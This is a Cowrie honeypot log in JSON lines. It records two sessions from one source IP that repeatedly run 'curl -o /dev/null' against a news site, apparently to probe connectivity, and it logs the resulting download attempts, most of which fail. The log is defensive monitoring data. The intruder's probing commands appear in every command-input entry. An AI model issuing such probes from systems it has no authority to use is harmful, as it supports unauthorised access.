{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.434729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.451321Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.475970Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.485764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.487224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.489805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.490843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.514367Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.535179Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.540749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.541894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.543791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.544831Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.559567Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.565477Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.576525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.577659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.583788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.584832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.619845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.621123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.623091Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.625048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.625944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.661714Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.662892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.668395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.669403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.699558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.700741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.705217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.706114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.740287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.741125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.750196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.751098Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.786422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.787627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.798347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.799690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.844167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.851092Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.852453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.862518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.863711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.864915Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.890075Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.911876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.913203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.916545Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.923666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.924795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.954854Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.961699Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.962622Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.969841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.970819Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.972900Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.002193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.003879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.013364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.014855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.021832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.039883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.041082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.053989Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.055124Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.060408Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.061563Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.079710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.080834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.098790Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.099961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.123556Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.126512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.127565Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.144760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.145866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.168954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.170277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.189933Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.191622Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.256592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.257677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.297968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.298896Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.334605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.335621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.350056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.350791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.394256Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.396356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.397116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.399481Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.412744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.413587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.446928Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.448890Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.549446Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.550402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.553359Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.555634Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.557531Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.558541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.610872Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.612358Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.665200Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.666111Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.703841Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.768137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.769166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.771848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.772488Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.777780Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.779835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.837457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.838546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.842916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.843792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.916110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.917082Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:13.919977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.921538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:13.923252Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.030183Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.031192Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.032785Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.034580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
